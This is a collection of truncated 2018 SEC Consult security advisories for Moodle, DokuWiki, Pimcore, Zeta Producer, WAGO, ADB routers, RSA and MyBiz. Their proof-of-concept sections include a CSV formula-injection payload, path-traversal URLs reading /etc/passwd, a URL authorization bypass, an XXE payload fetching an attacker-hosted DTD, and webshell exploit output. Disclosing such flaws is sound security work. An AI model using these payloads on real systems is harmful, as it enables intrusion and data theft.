from RIPS Technologies)
2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880]
created)
2018-07-09: Vendor replied and supplied a fix for the vulnerability
2018-09-10: Vendor releases patched version
2018-09-18: Public release of security advisory
Solution:
-
The vendor provides a patched version (3.5.2) which should be installed
immediately:
https://download.moodle.org/releases/latest/
The vendor also provided a security advisory regarding this issue:
https://moodle.org/mod/forum/discuss.php?d=376023#p1516118
Workaround:
---
Disable import of ddwtos questions through XML files.
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | A
SEC Consult SA-20180906-0 :: CSV Formula Injection in DokuWiki
SEC Consult Vulnerability Lab Security Advisory < 20180906-0 >
===
title: CSV Formula Injection
product: DokuWiki
vulnerable version: 2018-04-22a "Greebo" and older versions
fixed version: None
CVE number: CVE-2018-15474
impact: Medium
homepage: https://www.dokuwiki.org
found: 2018-07-09
by: Jean-Benjamin Rousseau (Office Zurich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"DokuWiki is a simple to use and highly versatile Open Source wiki software
that doesn't require a database. It is loved by users for its clean and
readable syntax. The ease of maintenance, backup and integration makes it
an administrator's favorite. Built in access controls and authentication
connectors make DokuWiki especially useful in the enterprise context
and the large number of plugins contributed by its vibrant community allow
for a broad range of use cases beyond a traditional wiki."
Source: https://www.dokuwiki.org/dokuwiki
Business recommendation:
The issue will not be fixed according to the vendor. Users are advised
to be careful when opening files via the CSV export functionality.
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
---
1) CSV Formula Injection vulnerability
The administration panel of the application has a "CSV export of users"
feature which allows the export of user data (username, real name,
email address and user groups) as a CSV file. On the registration page,
it is possible for an attacker to set certain values in the Real Name field
that - when exported and opened with a spreadsheet application
(Microsoft Excel, Open Office, etc.) - will be interpreted as a formula.
This puts the administrators who open those malicious exported files at risk.
Exfiltration of sensitive data or even the execution of arbitrary code
on the local machine of the victim will be the result. The final impact
depends on the used spreadsheet software on the client of the victim.
Proof of concept:
-
1) CSV Formula Injection vulnerability
Registration URL:
http://www.example.com/doku.php?id=start=register
When the registration request is submitted, the following parameters are sent
in a POST request:
sectok==register=1=login_parameter=evil_csv_formula_injection_payload=email_address
The "fullname" parameter is not sanitized before being stored and during
the CSV export. An attacker can inject different CSV formula
payloads in the fullname parameter.
For example:
=cmd|'/C calc'!A0
As soon as the file gets opened in Microsoft Excel, the program calc.exe is
launched. Different warnings might pop up. However, these warnings are usually
ignored because the file comes from a trusted source.
Vulnerable / tested versions:
-
The latest version 2018-04-22a "Greebo" has been tested:
https://download.dokuwiki.org/out/dokuwiki-8a269cc015a64b40e4c918699f1e1142.tgz
Also found to be vulnerable:
2017-02-19 stable release
2016-06-26 stable release
2015-08-10 stable release
2014-09-29 stable release
2014-05-05 stable release
2013-12-08 stable release
Vendor contact timeline:
2018-07-18: Contacting vendor through a...@splitbrain.org
2018-07-18: Vendor replied, they asked for the advisory without encryption
2018-07-19: Advisory sent without encryption
2018-07-19: Vendor replied with no intention to fix the vulnerability
2018-07-30: Reminder sent to the vendor. No reply
2018-08-20: Ask for updates to the vendor
2018-08-20: Vendor replied that no patch will be provided
2018-09-06: Public release of security advisory
Solution:
-
The issue will not be fixed according to the vendor:
https://github.com/splitbrain/dokuwiki/issues/2450
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive te
SEC Consult SA-20180813-0 :: SQL Injection, XSS & CSRF vulnerabilities in Pimcore
SEC Consult Vulnerability Lab Security Advisory < 20180813-0 >
===
title: SQL Injection, XSS & CSRF vulnerabilities
product: Pimcore
vulnerable version: 5.2.3 and below
fixed version: 5.3.0
CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059
impact: High
homepage: https://pimcore.com/en
found: 2018-06-11
by: T. Silpavarangkura (Office Bangkok)
N. Rai-Ngoen (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Pimcore is an award-winning consolidated open source enterprise platform for
master data management (PIM/MDM), user experience management (CMS/UX), digital
asset management (DAM) and eCommerce."
Source: https://pimcore.com/en
Business recommendation:
The vendor provides a patch for most identified issues, but XSS will not be
fixed
according to the vendor.
An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected from further security issues.
Vulnerability overview/description:
---
1. SQL Injection (CVE-2018-14058)
Multiple SQL injection vulnerabilities have been identified in the REST web
service API. An attacker who obtains a valid API key that is granted a
necessary permission could successfully perform an attack to extract
information from the database.
2. Stored Cross-site Scripting (CVE-2018-14059)
Multiple stored cross-site scripting vulnerabilities have been identified
across multiple functions in the application, which allows an authenticated
attacker to insert arbitrary JavaScript code in virtually all text fields and
data entries in the application.
3. Cross-site Request Forgery (CVE-2018-14057)
Multiple functions in the application are not protected by the existing
anti-CSRF token, which allows an attacker to perform a cross-site request
forgery attack to at least add, update or delete entries, among other actions.
Proof of concept:
-
1. SQL Injection (CVE-2018-14058)
The following URLs demonstrate the issue:
http:///webservice/rest/asset-count?apikey=[...]=
http:///webservice/rest/asset-inquire?apikey=[...]=
http:///webservice/rest/asset-list?apikey=[...]=
http:///webservice/rest/document-count?apikey=[...]=
http:///webservice/rest/document-inquire?apikey=[...]=
http:///webservice/rest/document-list?apikey=[...]=
http:///webservice/rest/object-count?apikey=[...]=
http:///webservice/rest/object-inquire?apikey=[...]=
http:///webservice/rest/object-list?apikey=[...]=
Note that a valid API key that is granted at least either "Assets", "Documents"
or "Objects" permission is required to perform an SQL injection attack against
associated API endpoints successfully.
2. Stored Cross-site Scripting (CVE-2018-14059)
Most of the text fields in pop-up dialogs and data entries in the application
are vulnerable to the cross-site scripting vulnerability, which can be
exploited by an authenticated attacker. For example, the attacker could insert
an attack payload while performing at least the following actions:
1) Edit a user account's first name/last name/e-mail address.
2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/
Quantity Value/Static Routes entry value in the table.
3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/
Field-Collections/Objectbrick/Classification Store item.
The vendor stated that many identified XSS issues only affect administrative
functions and hence the issues will not be fixed:
"They are only affecting administrative functionalities (higher privileges
required) - so this isn't used by non-trusted users - a check just adds
additional overhead without any benefits for security."
SEC Consult argued multiple times that XSS can still be exploited e.g. when a
higher privileged user gets attacked and the issues should be fixed
nevertheless.
3. Cross-site Request Forgery (CVE-2018-14057)
The existing anti-CSRF token in the HTTP request header named
"X-pimcore-csrf-token" was found to be validated only in the "Settings >
Users / Roles" function. Therefore, an attacker could perform a cross-site
request forgery attack against virtually all other functions in order to
at least add, update and delete data without having to submit the anti-CSRF
token.
The non-exhaustive list of affected requests are listed below:
POST /admin/asset/add-asset
POST /admin/asset/add-asset-compatibility
GET /admin/asset/delete
GET /admin/asset/import-server
GET /admin
SEC Consult SA-20180712-0 :: Remote Code Execution & Local File Disclosure in Zeta Producer Desktop CMS
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
===
title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
vulnerable version: <=14.2.0
fixed version: >=14.2.1
CVE number: CVE-2018-13981, CVE-2018-13980
impact: critical
homepage: https://www.zeta-producer.com
found: 2017-11-25
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"With Zeta Producer, the website builder and online shop system for Windows,
you can create and manage your website locally, on your computer.
Get without expertise in 3 steps to your own homepage: select design,
paste content, publish website. Finished."
Source: https://www.zeta-producer.com/de/index.html
Business recommendation:
The vendor provides a patched version which should be installed immediately.
Users of the product also need to verify that the affected widgets are updated
in
the corresponding website project! It could be necessary to rebuild the whole
project or copy the new widgets to the website projects. For further information
consult the vendor.
Furthermore, an in-depth security analysis is highly advised, as the software
may
be affected from further security issues.
Vulnerability overview/description:
---
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server but if the user uploads a PHP script with a .php extension
then the server will rename it to .phps to prevent PHP code execution.
However, the attacker can upload .php5 or .phtml to the server without any
restriction. These alternative file extensions can be executed as PHP code.
Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.
Unfortunately, if the server permits directory listing, the attacker
can easily browse to the uploaded PHP script. If no directory listing is
enabled the attacker can still bruteforce the random name to gain remote
code execution via the PHP script as well. Testing on a local server it
took about 20 seconds to brute force the random name. This attack will
be slower over the Internet but it is still feasible.
Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
they are also vulnerable because the web server will be running on TCP port
9153.
The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php
2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an
unauthenticated attacker can read local files by exploiting path traversal
issues.
The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php
Proof of concept:
-
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]
When the script is executed, a PHP script (shell) will be uploaded
automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found :
http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to
read
arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc=list
Vulnerable / tested versions:
-
The following versions have been tested which were the latest version available
at the time of the test:
Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0
Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/
Vendor contact timeline:
2017-11-29: Contacting vendor through i...@zeta-producer.com and various other
email addresses from the website. No reply.
2017-12-13:
SEC Consult SA-20180711-0 :: Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
===
title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
vulnerable version: FW 01 - 01.01.10(01)
fixed version: FW 02
CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
impact: High
homepage: https://www.wago.com/
found: 2018-04-25
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"New ideas are the driving force behind our success WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."
Source: http://www.wago.us/wago/
"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY
7300T Web Panels help you reinforce the quality of your machinery and equipment
with a refined design and industry-leading software. Learn more about how the
right Web Panels make a difference.
HMI components are the finishing touch for machines or systems and they have an
overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing
HMIs that leave a lasting impression and significantly increase both the value
and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is
available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."
Source:
http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp
Business recommendation:
HMI displays are widely used in SCADA infrastructures. The link between
their administrative (or informational) web interfaces and the users which
access these interfaces is critical. The presented attacks demonstrate how
simple it is to inject malicious code in order to break the security of this
link by exploiting minimal user interaction.
As a consequence a computer which is used for HMI administration should not
provide any possibility to get compromised via malicious script code.
One possible solution may be e.g.:
* Don't allow email clients
* Don't provide Internet access at all on the HMI stations
SEC Consult recommends to immediately apply the available patches from the
vendor.
A thorough security review should be performed by security professionals to
identify further potential security issues.
Vulnerability overview/description:
---
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross site scripting vulnerabilities were identified within multiple
PHP
scripts in the admin interface. The parameter JSON input which is sent to the
device is not sanitized sufficiently. An attacker can exploit this
vulnerability to execute arbitrary scripts in the context of the attacked user
and gain control over the active session.
This vulnerability is present for authenticated and unauthenticated users!
2) Stored Cross-Site Scripting (CVE-2018-12981)
A stored cross-site scripting vulnerability was identified within the
"PLC List" which can be configured in the web interface of the e!Display. By
storing a payload there, an administrative or guest user can be attacked
without tricking them to visit a malicious web site or clicking on an
malicious link.
This vulnerability is only present for authenticated users!
3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check. It is even
possible to change the location of the uploaded file on the system. As the
web service does not run as privileged user, it is not possible to upload a
file directly to the web root but on many other locations on the file system.
The normal user 'user' and the administrative user 'admin' can both upload
files to the system.
4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions a file in the web root can be overwritten
by the unprivileged 'www' user. This is the same user which is used in the
context of the web server.
5) Remote code execution via
SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:
Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/
Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/
SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
===
title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers
(based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13110
impact: critical
homepage: http://www.adbglobal.com
found: 2016-07-11
by: Stefan Viehböck (Office Vienna)
Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/
"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast
Business recommendation:
By exploiting the group manipulation vulnerability on affected and unpatched
devices an attacker is able to gain access to the command line interface (CLI)
if previously disabled by the ISP.
Depending on the feature-set of the CLI (ISP dependent) it is then possible to
gain access to the whole configuration and manipulate settings in the web GUI
and escalate privileges to highest access rights.
It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.
Vulnerability overview/description:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to
gain access to the CLI (if it has been previously disabled by the configuration)
and escalate his privileges.
Depending on the CLI features it is possible to extract the whole configuration
and manipulate settings or gain access to debug features of the device, e.g.
via "debug", "upgrade", "upload" etc. commands in the CLI.
Attackers can gain access to sensitive configuration data such as VoIP
credentials or other information and manipulate any settings of the device.
Proof of concept:
-
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
It is possible to manipulate the group name setting of "Storage users" and
overwrite the local linux groups called "remoteaccess" or "localaccess" in
(in /etc/group) which define access to Telnet or SSH on the ADB devices.
It may be possible to overwrite the "root" group as well but it may brick the
device and the default user is already within the "root" group. Hence this
attack has not been further tested.
The following steps describe the attack:
a) Add a new group called "localaccess" via the web GUI here:
http://$IP/ui/dboard/storage/storageusers?backto=storage
This will generate the following new group in /etc/group. The original
"localaccess" group will overwritten.
localaccess:Storage Group:5001:
b) Then delete this group via the web GUI again, the entry will be removed
from /etc/group completely.
c) Afterwards, create the following new group name entry via the web GUI and
add your user account (e.g. admin) wh
SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:
Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/
Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/
SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
===
title: Authorization Bypass
product: All ADB Broadband Gateways / Routers
(based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13109
impact: critical
homepage: http://www.adbglobal.com
found: 2016-06-28
by: Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/
"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast
Business recommendation:
By exploiting the authorization bypass vulnerability on affected and unpatched
devices an attacker is able to gain access to settings that are otherwise
forbidden for the user, e.g. through strict settings set by the ISP. It is also
possible to manipulate settings to e.g. enable the telnet server for remote
access if it had been previously disabled by the ISP. The attacker needs some
user account, regardless of the permissions, for login, e.g. the default one
provided by the ISP or printed on the device can be used.
It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.
Vulnerability overview/description:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB
device, a standard user account may not have all settings enabled within
the web GUI.
An authenticated attacker is able to bypass those restrictions by adding a
second slash in front of the forbidden entry of the path in the URL.
It is possible to access forbidden entries within the first layer of the web
GUI, any further subsequent layers/paths (sub menus) were not possible to access
during testing but further exploitation can't be ruled out entirely.
Proof of concept:
-
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver
Adding a second slash in front of the blocked entry "telnetserver" will enable
full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver
This works for many other settings within the web GUI!
In our tests it was not possible to access subsequent layers, e.g.:
Assume that both the proxy menu and submenu "rtsp" settings are blocked,
a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp
Nevertheless, it can't be ruled out that sub menus can be accessed too when
further deeper tests are being performed.
Vulnerable / tested versions:
-
The following devices & firmware have been tested which were the most recent
versions at the time of discovery:
The firmware versions depend on the ISP / customer of ADB and may vary!
ADB P.RG AV4202N - E_
SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:
Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/
Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/
SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
===
title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers
(based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13108
impact: critical
homepage: http://www.adbglobal.com
found: 2016-06-09
by: Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/
"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast
Business recommendation:
By exploiting the local root vulnerability on affected and unpatched devices
an attacker is able to gain full access to the device with highest privileges.
Attackers are able to modify any settings that might have otherwise been
prohibited by the ISP. It is possible to retrieve all stored user credentials
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network
side of the ISP are possible by using the device as a jump host, depending on
the internal network security measures.
Network security should not depend on the security of independent devices,
such as modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other users.
It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.
Vulnerability overview/description:
---
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports in order for customers to use them for
printer or file sharing. In the past, ADB devices have suffered from symlink
attacks e.g. via FTP server functionality which has been fixed in more recent
firmware versions.
The "Network File Sharing" feature of current ADB devices via USB uses a samba
daemon which accesses the USB drive with highest access rights and exports the
network shares with root user permissions. The default and hardcoded setting
for the samba daemon within the smb.conf on the device has set "wide links =
no" which normally disallows gaining access to the root file system of the
device using symlink attacks via a USB drive.
But an attacker is able to exploit both a web GUI input validation and samba
configuration file parsing problem which makes it possible to access the root
file system of the device with root access rights via a manipulated USB drive.
The attacker can then edit various system files, e.g. passwd and session
information of the web server in order to escalate web GUI privileges and
start a telnet server and gain full system level shell access as root.
This is a local attack and not possible via remote access vectors as an
attacker needs to insert a specially crafted USB drive into the device!
Usually not even the ISPs themselves have direct root access on ADB devices
hence this attack is quite p
SEC Consult SA-20180516-0 :: XXE & XSS vulnerabilities in RSA Authentication Manager
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
===
title: XXE & XSS vulnerabilities
product: RSA Authentication Manager
vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
fixed version: 8.3 P1 and later
CVE number: CVE-2018-1247
impact: High
homepage: https://www.rsa.com
found: 2017-11-16
by: Mantas Juskauskas (Office Vilnius)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about
Business recommendation:
By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication manager can be affected by exploiting client-side
issues.
SEC Consult recommends to apply the available patches from the vendor.
Vulnerability overview/description:
---
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The used XML parser is resolving XML external entities which allows an
authenticated attacker (or an attacker that is able to trick an authenticated
user into importing malicious XML files) to read files, send requests to
systems on the internal network (e.g port scanning) or cause a DoS (e.g.
billion laughs attack).
This issue has been fixed by RSA as described in the advisory DSA-2018-086.
(http://seclists.org/fulldisclosure/2018/May/18)
2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.
The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.
3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.
The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.
Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.
Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.
For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected
endpoint:
==
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: :7004
Cookie: [snip]
[snip]
-9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"
Content-Type: text/xml
/a.dtd">
-9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"
[snip]
==
In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:
==
# cat /var/www/a.dtd
:8080/%p1;'>">
%p2;
==
Assuming that the RSA Authentication Manager OS has network level access to
the TCP port 80 and 8080 of th
Re: SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
The following CVE numbers have been assigned now: XSS issue: CVE-2018-11090 Arbitrary File Upload: CVE-2018-11091 On 2018-05-14 13:25, SEC Consult Vulnerability Lab wrote: > SEC Consult Vulnerability Lab Security Advisory < 20180514-0 > > === > title: Arbitrary File Upload & Cross-site scripting > product: MyBiz MyProcureNet > vulnerable version: 5.0.0 > fixed version: unknown > CVE number: - > impact: Critical >homepage: http://www.mybiz.net/ > found: 2018-01-29 > by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) > Fikri Fadzil (Office Singapore) > Wan Ikram (Office Kuala Lumpur) > Jasveer Singh (Office Kuala Lumpur) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > > === > > Vendor description: > --- > "MyBiz is a company fixated on developing technology which transforms the way > business is done online. At the intersection of what one business needs from > another is the potential for value to be created differently. This > intersection for the exchange of value requires technology but in > fundamentally very different ways from traditional enterprise systems. MyBiz > believes that the chemistry of business is the business relationships between > enterprises. The strength of the business relationship drives the success and > future of the business. MyBiz believes that these business relationships need > to be captured and orchestrated. MyBiz developed our proprietary Business > Relationship Network engine, a platform to capture business relationships as > data to drive new business services which create value efficiently." > > Source: http://www.mybiz.net/copy-of-our-story > > > Business recommendation: > > The vendor did not reply to our inquiries since February 2018 hence the issues > might still exist in current versions. > > SEC Consult recommends not use this product until a thorough security review > has been performed by security professionals and all identified issues have > been resolved. It is assumed that MyBiz products are affected by further > critical security issues. > > > Vulnerability overview/description: > --- > The identified vulnerabilities can be exploited after authentication but > the registration for the application is usually open for anyone. > > 1. Arbitrary File Upload > A malicious file can be uploaded to the webserver by an attacker. It is > possible for an attacker to upload a script to issue operating system > commands. > > This vulnerability occurs because an attacker is able to adjust the > "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary > extensions to the whitelist during the upload. > > For instance, if the extension .asp is added to the > "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server > accepts "secctest.asp" as legitimate file. Hence malicious files can be > uploaded in order to execute arbitrary commands to take over the server. > > > 2. Reflected Cross-site scripting > This vulnerability within "ProxyPage.aspx" allows an attacker to inject > malicious client side scripting which will be executed in the browser of > users if they visit the manipulated site. > > > Proof of concept: > - > The proof of concept has been removed as no patch is available. > > > Vulnerable / tested versions: > - > MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. > This > was the latest version available at the time of the test. > > > Vendor contact timeline: > > 2018-02-22: Contacting vendor through i...@mybiz.net (no response) > 2018-02-27: Request update from vendor (no response) > 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us > (no response) > 2018-05-14: Public release of security advisory > > > Solution: > ----- > None > > > Workaround: > --- > None > > > Advisory URL: > - > https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html > > ~~~~~~~~~~~~~~~~~~~~
